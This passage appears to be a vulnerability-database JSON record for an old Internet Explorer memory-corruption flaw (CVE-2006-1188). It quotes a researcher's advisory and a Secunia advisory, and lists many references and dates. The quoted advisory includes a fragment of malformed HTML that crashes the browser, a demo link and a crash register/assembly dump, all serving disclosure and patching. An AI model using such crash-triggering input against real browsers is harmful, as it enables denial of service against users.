\u003c/bdo\n\u003e \u003c/th\n\u003e \u003c/object\n\u003e \u003c/q\u003e\n\u003e\n\u003e \u003col\u003e\n\u003e \u003cobject\u003e\n\nOnline-demo:\nhttp://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html\n\nThese are the register values and the ASM dump at the time of the access\nviolation:\n\u003e eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0\n\u003e edi=00000002 eip=7d529d35 esp=0012e778 ebp=0012e778\n\u003e\n\u003e 7d529d0e e811170000 call mshtml+0x7b424 (7d52b424)\n\u003e 7d529d13 85c0 test eax,eax\n\u003e 7d529d15 0f85c5500800 jne mshtml!DllGetClassObject+0x10fa2\n\u003e (7d5aede0)\n\u003e 7d529d1b 0fb65508 movzx edx,byte ptr [ebp+0x8]\n\u003e 7d529d1f 8d849680000000 lea eax,[esi+edx*4+0x80]\n\u003e 7d529d26 5e pop esi\n\u003e 7d529d27 5d pop ebp\n\u003e 7d529d28 c20c00 ret 0xc\n\u003e 7d529d2b 90 nop\n\u003e 7d529d2c 90 nop\n\u003e 7d529d2d 90 nop\n\u003e 7d529d2e 90 nop\n\u003e 7d529d2f 90 nop\n\u003e 7d529d30 8bff mov edi,edi\n\u003e 7d529d32 55 push ebp\n\u003e 7d529d33 8bec mov ebp,esp\n\u003e FAULT -\u003e7d529d35 0fbe4114 movsx eax,byte ptr [ecx+0x14]\n\u003e ds:0023:00000014=??\n\u003e 7d529d39 c1e004 shl eax,0x4\n\u003e 7d529d3c 0578aa4b7d add eax,0x7d4baa78\n\u003e 7d529d41 7410 jz mshtml+0x79d53 (7d529d53)\n\u003e 7d529d43 8b400c mov eax,[eax+0xc]\n\u003e 7d529d46 234508 and eax,[ebp+0x8]\n\u003e 7d529d49 f7d8 neg eax\n\u003e 7d529d4b 1bc0 sbb eax,eax\n\u003e 7d529d4d f7d8 neg eax\n\u003e 7d529d4f 5d pop ebp\n\u003e 7d529d50 c20400 ret 0x4\n\u003e 7d529d53 33c0 xor eax,eax\n\u003e 7d529d55 ebf8 jmp mshtml+0x79d4f (7d529d4f)\n\no Vulnerable versions:\n=====================\n\nThe DoS vulnerability was successfully tested on:\n\u003e MS IE 6 SP2 - Win XP Pro SP2\n\u003e MS IE 6 - Win 2k SP4\n\no Disclosure Timeline:\n=====================\n\nxx Feb 06 - Vulnerabilities discovered. \n08 Mar 06 - Vendor contacted. \n22 Mar 06 - Vendor confirmed vulnerabilities. \n25 May 06 - Public release. \n\no Solution:\n==========\n\nInstall the latest security update (MS06-013) for Internet Explorer [2]. \n\no Credits:\n=========\n\nThomas Waldegger \u003cbugtraq@morph3us.org\u003e\nBuHa-Security Community - http://buha.info/board/\n\nIf you have questions, suggestions or criticism about the advisory feel\nfree to send me a mail. The address \u0027bugtraq@morph3us.org\u0027 is more a\nspam address than a regular mail address therefore it\u0027s possible that\nsome mails get ignored. Please use the contact details at\nhttp://morph3us.org/ to contact me. \n\nGreets fly out to cyrus-tc, destructor, nait, rhy, trappy and all\nmembers of BuHa. \n\n----------------------------------------------------------------------\n\nBist Du interessiert an einem neuen Job in IT-Sicherheit?\n\n\nSecunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-\nSicherheit:\nhttp://secunia.com/secunia_vacancies/\n\n----------------------------------------------------------------------\n\nTITLE:\nMicrosoft Design Tools msdds.dll Code Execution Vulnerability\n\nSECUNIA ADVISORY ID:\nSA16480\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/16480/\n\nCRITICAL:\nHighly critical\n\nIMPACT:\nSystem access\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nMicrosoft Visual Studio .NET 2003\nhttp://secunia.com/product/1086/\nMicrosoft Office 2003 Student and Teacher Edition\nhttp://secunia.com/product/2278/\nMicrosoft Office 2003 Standard Edition\nhttp://secunia.com/product/2275/\nMicrosoft Internet Explorer 5.01\nhttp://secunia.com/product/9/\nMicrosoft Internet Explorer 5.5\nhttp://secunia.com/product/10/\nMicrosoft Internet Explorer 6.x\nhttp://secunia.com/product/11/\nMicrosoft Office 2003 Professional Edition\nhttp://secunia.com/product/2276/\nMicrosoft Office 2003 Small Business Edition\nhttp://secunia.com/product/2277/\n\nDESCRIPTION:\nA vulnerability has been reported in Microsoft Visual Studio .NET,\nwhich potentially can be exploited by malicious people to compromise\na vulnerable system. \n\nThe COM object is known to be installed as part of the following\nproducts:\n* Microsoft Visual Studio .NET 2003\n* Microsoft Office Professional 2003\n\nOther products may also include the affected COM object. \n\nNOTE: An exploit has been published. However, there are currently\nconflicting reports about the exploitability of this issue. Some\nreports confirm that code execution is possible, while other reports\nindicate that the problem can\u0027t be reproduced. Secunia has currently\nnot been able to reproduce the vulnerability in version 7.10.3077.0\nof the COM object. \n\nThis advisory will be updated when more information is available. \n\nSOLUTION:\nRestrict use of ActiveX controls to trusted web sites only. \n\nPROVIDED AND/OR DISCOVERED BY:\nReported by anonymous person. \n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1188"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000174"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#824324"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "BID",
"id": "17468"
},
{
"db": "VULHUB",
"id": "VHN-17296"
},
{
"db": "PACKETSTORM",
"id": "45345"
},
{
"db": "PACKETSTORM",
"id": "46765"
},
{
"db": "PACKETSTORM",
"id": "39471"
}
],
"trust": 9.45
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-17296",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-17296"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#824324",
"trust": 3.4
},
{
"db": "NVD",
"id": "CVE-2006-1188",
"trust": 3.0
},
{
"db": "USCERT",
"id": "TA06-101A",
"trust": 2.6
},
{
"db": "SECUNIA",
"id": "18957",
"trust": 2.5
},
{
"db": "CERT/CC",
"id": "VU#959049",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2006-1318",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1015900",
"trust": 1.7
},
{
"db": "CERT/CC",
"id": "VU#740372",
"trust": 1.6
},
{
"db": "CERT/CC",
"id": "VU#939605",
"trust": 1.6
},
{
"db": "CERT/CC",
"id": "VU#680526",
"trust": 1.6
},
{
"db": "BID",
"id": "17468",
"trust": 1.2
},
{
"db": "CERT/CC",
"id": "VU#234812",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#876678",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#984473",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#641460",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#341028",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#434641",
"trust": 0.9
},
{
"db": "SECUNIA",
"id": "16480",
"trust": 0.9
},
{
"db": "SECUNIA",
"id": "19583",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "18680",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "16373",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "19269",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "19606",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "19378",
"trust": 0.8
},
{
"db": "BID",
"id": "17181",
"trust": 0.8
},
{
"db": "BID",
"id": "14594",
"trust": 0.8
},
{
"db": "XF",
"id": "21895",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014727",
"trust": 0.8
},
{
"db": "XF",
"id": "21193",
"trust": 0.8
},
{
"db": "BID",
"id": "14087",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "15891",
"trust": 0.8
},
{
"db": "OSVDB",
"id": "17680",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014329",
"trust": 0.8
},
{
"db": "USCERT",
"id": "SA06-101A",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000174",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200604-164",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "1838",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-17296",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#503124",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "45345",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "46765",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "39471",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#824324"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "VULHUB",
"id": "VHN-17296"
},
{
"db": "BID",
"id": "17468"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000174"
},
{
"db": "PACKETSTORM",
"id": "45345"
},
{
"db": "PACKETSTORM",
"id": "46765"
},
{
"db": "PACKETSTORM",
"id": "39471"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-164"
},
{
"db": "NVD",
"id": "CVE-2006-1188"
}
]
},
"id": "VAR-200604-0201",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-17296"
}
],
"trust": 0.01
},
"last_update_date": "2024-07-23T22:05:29.066000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "MS06-013",
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx"
},
{
"title": "MS06-013",
"trust": 0.8,
"url": "http://www.microsoft.com/japan/technet/security/bulletin/ms06-013.mspx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-000174"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1188"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx"
},
{
"trust": 2.5,
"url": "http://www.us-cert.gov/cas/techalerts/ta06-101a.html"
},
{
"trust": 2.5,
"url": "http://www.kb.cert.org/vuls/id/824324"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/435096/30/4710/threaded"
},
{
"trust": 1.7,
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-013"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1144"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1290"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1296"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1773"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1015900"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/18957"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2006/1318"
},
{
"trust": 1.6,
"url": "http://www.kb.cert.org/vuls/id/959049"
},
{
"trust": 1.6,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-052.mspx"
},
{
"trust": 1.6,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-037.mspx"
},
{
"trust": 1.6,
"url": "about vulnerability notes"
},
{
"trust": 1.6,
"url": "contact us about this vulnerability"
},
{
"trust": 1.6,
"url": "provide a vendor statement"
},
{
"trust": 0.9,
"url": "http://secunia.com/advisories/16480/"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/19583/"
},
{
"trust": 0.8,
"url": "http://msdn.microsoft.com/archive/default.asp?url=/archive/en-us/dnarmdac/html/msdn_remtdata.asp"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/advisory/917077.mspx"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/18680/"
},
{
"trust": 0.8,
"url": "http://blogs.technet.com/msrc/archive/2006/03/22/422849.aspx"
},
{
"trust": 0.8,
"url": "http://msdn.microsoft.com/workshop/author/dhtml/reference/methods/createtextrange.asp"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/com/default.mspx"
},
{
"trust": 0.8,
"url": "http://msdn.microsoft.com/library/default.asp?url=/workshop/components/activex/activex_node_entry.asp"
},
{
"trust": 0.8,
"url": "http://support.microsoft.com/kb/159621"
},
{
"trust": 0.8,
"url": "http://support.microsoft.com/kb/216434"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/archive/1/391803"
},
{
"trust": 0.8,
"url": "http://www.kb.cert.org/vuls/id/939605"
},
{
"trust": 0.8,
"url": "http://www.kb.cert.org/vuls/id/740372"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-038.mspx"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/16373/"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/19269/"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-015.mspx"
},
{
"trust": 0.8,
"url": "http://support.microsoft.com/kb/918165"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/19606/"
},
{
"trust": 0.8,
"url": "http://jeffrey.vanderstad.net/grasshopper/"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/19378/"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/17181 "
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/advisory/906267.mspx"
},
{
"trust": 0.8,
"url": "http://www.kb.cert.org/vuls/id/680526"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/14594"
},
{
"trust": 0.8,
"url": "http://www.securitytracker.com/alerts/2005/aug/1014727.html"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/21895"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/advisory/903144.mspx"
},
{
"trust": 0.8,
"url": "http://www.sec-consult.com/184.html"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/15891/ "
},
{
"trust": 0.8,
"url": "http://www.securitytracker.com/alerts/2005/jun/1014329.html"
},
{
"trust": 0.8,
"url": "http://www.osvdb.org/displayvuln.php?osvdb_id=17680"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/14087"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/21193"
},
{
"trust": 0.8,
"url": "http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33120"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1188"
},
{
"trust": 0.8,
"url": "http://www.frsirt.com/english/advisories/2006/1318"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnta06-101a/index.html"
},
{
"trust": 0.8,
"url": "http://jvn.jp/tr/trta06-101a/"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2006-1188"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/18957/"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/17468"
},
{
"trust": 0.8,
"url": "http://www.us-cert.gov/cas/alerts/sa06-101a.html"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/alerts/id/220"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/alerts/id/217"
},
{
"trust": 0.3,
"url": "http://www.mozilla.com/"
},
{
"trust": 0.3,
"url": "/archive/1/435096"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/641460\u003e"
},
{
"trust": 0.1,
"url": "https://update.microsoft.com/microsoftupdate\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1189\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-0003\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1185\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/984473\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/341028\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1388\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-0012\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/reading_room/securing_browser/#internet_ex"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1188\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/signup.html\u003e."
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/234812\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/434641\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/824324\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/techalerts/ta06-101a.html\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1359\u003e"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-apr.mspx\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1245\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/503124\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1186\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/876678\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/959049\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/legal.html\u003e"
},
{
"trust": 0.1,
"url": "http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html"
},
{
"trust": 0.1,
"url": "http://en.wikipedia.org/wiki/internet_explorer"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/windows/ie/default.mspx"
},
{
"trust": 0.1,
"url": "http://morph3us.org/advisories/20060525-msie6-sp2-2.txt"
},
{
"trust": 0.1,
"url": "http://www.w3.org/tr/html4/loose.dtd\"\u003e"
},
{
"trust": 0.1,
"url": "http://buha.info/board/"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/windows/ie/"
},
{
"trust": 0.1,
"url": "http://morph3us.org/"
},
{
"trust": 0.1,
"url": "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd\"\u003e"
},
{
"trust": 0.1,
"url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1188"
},
{
"trust": 0.1,
"url": "http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/10/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2276/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/9/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2277/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/11/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_vacancies/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2278/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2275/"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1086/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#824324"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "VULHUB",
"id": "VHN-17296"
},
{
"db": "BID",
"id": "17468"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000174"
},
{
"db": "PACKETSTORM",
"id": "45345"
},
{
"db": "PACKETSTORM",
"id": "46765"
},
{
"db": "PACKETSTORM",
"id": "39471"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-164"
},
{
"db": "NVD",
"id": "CVE-2006-1188"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#824324"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "VULHUB",
"id": "VHN-17296"
},
{
"db": "BID",
"id": "17468"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000174"
},
{
"db": "PACKETSTORM",
"id": "45345"
},
{
"db": "PACKETSTORM",
"id": "46765"
},
{
"db": "PACKETSTORM",
"id": "39471"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-164"
},
{
"db": "NVD",
"id": "CVE-2006-1188"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#234812"
},
{
"date": "2006-03-23T00:00:00",
"db": "CERT/CC",
"id": "VU#876678"
},
{
"date": "2005-08-19T00:00:00",
"db": "CERT/CC",
"id": "VU#680526"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#984473"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#824324"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#641460"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#341028"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#434641"
},
{
"date": "2005-08-18T00:00:00",
"db": "CERT/CC",
"id": "VU#740372"
},
{
"date": "2005-07-02T00:00:00",
"db": "CERT/CC",
"id": "VU#939605"
},
{
"date": "2006-04-11T00:00:00",
"db": "VULHUB",
"id": "VHN-17296"
},
{
"date": "2006-04-11T00:00:00",
"db": "BID",
"id": "17468"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-000174"
},
{
"date": "2006-04-12T04:12:55",
"db": "PACKETSTORM",
"id": "45345"
},
{
"date": "2006-05-29T07:36:29",
"db": "PACKETSTORM",
"id": "46765"
},
{
"date": "2005-08-19T04:15:49",
"db": "PACKETSTORM",
"id": "39471"
},
{
"date": "2006-04-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200604-164"
},
{
"date": "2006-04-11T23:02:00",
"db": "NVD",
"id": "CVE-2006-1188"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-11-02T00:00:00",
"db": "CERT/CC",
"id": "VU#234812"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#876678"
},
{
"date": "2007-10-11T00:00:00",
"db": "CERT/CC",
"id": "VU#680526"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#984473"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#824324"
},
{
"date": "2006-05-15T00:00:00",
"db": "CERT/CC",
"id": "VU#641460"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#341028"
},
{
"date": "2006-04-12T00:00:00",
"db": "CERT/CC",
"id": "VU#434641"
},
{
"date": "2005-10-13T00:00:00",
"db": "CERT/CC",
"id": "VU#740372"
},
{
"date": "2005-07-12T00:00:00",
"db": "CERT/CC",
"id": "VU#939605"
},
{
"date": "2018-10-18T00:00:00",
"db": "VULHUB",
"id": "VHN-17296"
},
{
"date": "2006-05-26T19:48:00",
"db": "BID",
"id": "17468"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-000174"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200604-164"
},
{
"date": "2021-07-23T15:04:41.580000",
"db": "NVD",
"id": "CVE-2006-1188"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200604-164"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "RDS.Dataspace ActiveX control bypasses ActiveX security model",
"sources": [
{
"db": "CERT/CC",
"id": "VU#234812"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200604-164"
}
],
"trust": 0.6
}
}
VAR-200604-0209
Vulnerability from variot - Updated: 2024-07-23 19:40Unspecified vulnerability in Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via certain invalid HTML that causes memory corruption. This can cause a variety of impacts, such as causing IE to crash. Microsoft Internet Explorer (IE) fails to properly handle HTA files. This vulnerability occurs when the browser parses invalid HTML. Attackers can exploit this vulnerability through a malicious web page or HTML email. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA06-101A
Microsoft Windows and Internet Explorer Vulnerabilities
Original release date: April 11, 2006 Last revised: -- Source: US-CERT
Systems Affected
* Microsoft Windows
